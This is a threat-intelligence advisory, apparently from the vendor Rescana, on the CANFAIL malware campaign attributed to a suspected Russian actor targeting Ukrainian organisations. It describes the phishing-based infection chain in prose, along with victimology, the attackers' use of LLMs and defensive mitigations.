Executive Summary

Google’s Threat Analysis Group (TAG) has recently attributed a series of highly targeted cyberattacks against Ukrainian organizations to a suspected Russian state-aligned threat actor. These attacks are characterized by the deployment of a novel malware family, CANFAIL, which is delivered through advanced phishing campaigns leveraging social engineering and cloud-based delivery mechanisms. The primary targets include Ukrainian defense, government, energy, and humanitarian sectors, with evidence of reconnaissance and attempted compromise in neighboring countries such as Romania and Moldova. The sophistication of the campaign, including the use of Large Language Models (LLMs) for crafting phishing lures and automating reconnaissance, marks a significant evolution in the threat landscape. This report provides a comprehensive technical analysis of the CANFAIL malware, the tactics, techniques, and procedures (TTPs) employed by the threat actor, observed exploitation in the wild, victimology, and actionable mitigation strategies.

Threat Actor Profile

The threat actor behind the CANFAIL campaign is assessed by Google TAG as likely affiliated with Russian intelligence services, though it has not yet been assigned a formal APT designation. This group demonstrates a growing operational maturity, leveraging both traditional spearphishing and modern AI-driven techniques. Unlike more established Russian APTs such as APT28 (Fancy Bear) or APT29 (Cozy Bear), this actor is notable for its rapid adoption of LLMs to enhance the quality and targeting of phishing lures, automate reconnaissance, and streamline command and control (C2) operations. The actor’s infrastructure and operational security are less sophisticated than top-tier APTs, but the use of cloud services and memory-resident malware increases the difficulty of detection and attribution. The group’s targeting aligns with Russian strategic interests in the region, focusing on critical infrastructure, military, and organizations supporting Ukraine’s war effort.

Technical Analysis of Malware/TTPs

The CANFAIL malware is a multi-stage, memory-resident payload delivered via highly targeted phishing emails. The initial infection vector is a spearphishing email, often impersonating Ukrainian or Romanian energy organizations. These emails contain links to Google Drive hosting RAR archives. The archive includes a file with a double extension, such as invoice.pdf.js, designed to appear as a benign document but is in fact an obfuscated JavaScript file.

Upon execution, the JavaScript initiates a PowerShell script that downloads and executes a memory-only dropper. This dropper establishes persistence and initiates C2 communication with attacker-controlled infrastructure, typically leveraging dynamic DNS and cloud-based endpoints to evade static detection. The malware displays a fake error message to the user to reduce suspicion and hinder incident response.

The CANFAIL payload is capable of credential harvesting, system reconnaissance, and lateral movement. It employs advanced obfuscation techniques, including string encoding and anti-analysis checks, to evade endpoint detection and response (EDR) solutions. The use of LLMs by the threat actor is evident in the highly personalized phishing lures and the automation of post-exploitation tasks, such as generating custom C2 instructions and crafting convincing decoy documents.

Related campaigns, such as PhantomCaptcha (documented by SentinelOne SentinelLABS), have been linked to the same actor. These campaigns utilize similar phishing techniques, including fake web pages with ClickFix-style instructions and the delivery of WebSocket-based trojans, further demonstrating the actor’s evolving toolkit.

Exploitation in the Wild

The CANFAIL campaign has been observed actively targeting Ukrainian defense, military, government, and energy organizations. There is also evidence of attempted compromise in the aerospace, manufacturing (particularly those with military or drone ties), nuclear and chemical research, and international humanitarian sectors. The threat actor has expanded reconnaissance activities into Romania and Moldova, focusing on energy sector organizations with Ukrainian connections.

Successful exploitation results in unauthorized access to both organizational and personal email accounts, with the potential for further lateral movement and data exfiltration. The use of memory-resident malware and cloud-based delivery mechanisms complicates detection and remediation efforts. The campaign’s reliance on social engineering and AI-generated content increases the likelihood of user interaction and successful compromise.

Victimology and Targeting

The primary victims of the CANFAIL campaign are Ukrainian organizations involved in defense, government, energy, and humanitarian aid. The actor has demonstrated a particular interest in entities supporting Ukraine’s war effort, including international organizations involved in conflict monitoring and relief. Secondary targeting includes Romanian and Moldovan energy companies, likely as part of broader reconnaissance and supply chain compromise efforts.

The actor’s targeting methodology is highly selective, utilizing curated email address lists derived from open-source intelligence and proprietary research. Phishing lures are tailored to the recipient’s sector and region, often referencing current events or organizational relationships to increase credibility. The use of LLMs enables the rapid generation of convincing, context-aware phishing content, further increasing the campaign’s effectiveness.

Mitigation and Countermeasures

Organizations are advised to implement a multi-layered defense strategy to mitigate the risk posed by the CANFAIL campaign. User awareness training is critical, with a focus on recognizing phishing emails containing double extensions or unexpected Google Drive links. Email security solutions should be configured to block or flag attachments with suspicious file extensions, such as .pdf.js, and to scan compressed archives for embedded scripts.

Endpoint protection platforms must enable and monitor PowerShell script block logging to detect anomalous script execution. Security teams should monitor for unusual downloads from cloud storage services, particularly Google Drive, and investigate any instances of memory-resident PowerShell activity. Threat intelligence feeds should be leveraged to block known malicious domains, file hashes, and C2 endpoints associated with the campaign.

Incident response plans should be updated to account for the possibility of memory-only malware and cloud-based delivery mechanisms. Regular phishing simulations and tabletop exercises can help ensure organizational readiness. Collaboration with trusted threat intelligence providers, such as Rescana, can provide timely updates on emerging threats and actionable IOCs.

References

The Hacker News: Google Ties Suspected Russian Actor to CANFAIL Malware Attacks on Ukrainian Orgs, SentinelOne SentinelLABS: PhantomCaptcha Campaign, MITRE ATT&CK Framework, Google Cloud Blog: Threats to the Defense Industrial Base

About Rescana

Rescana is a leader in third-party risk management (TPRM), providing organizations with a comprehensive platform to assess, monitor, and mitigate cyber risks across their supply chain. Our advanced threat intelligence and automation capabilities empower security teams to proactively identify and respond to emerging threats, ensuring the resilience of critical business operations. For more information or to discuss how Rescana can support your organization’s cybersecurity posture, please contact us at ops@rescana.com.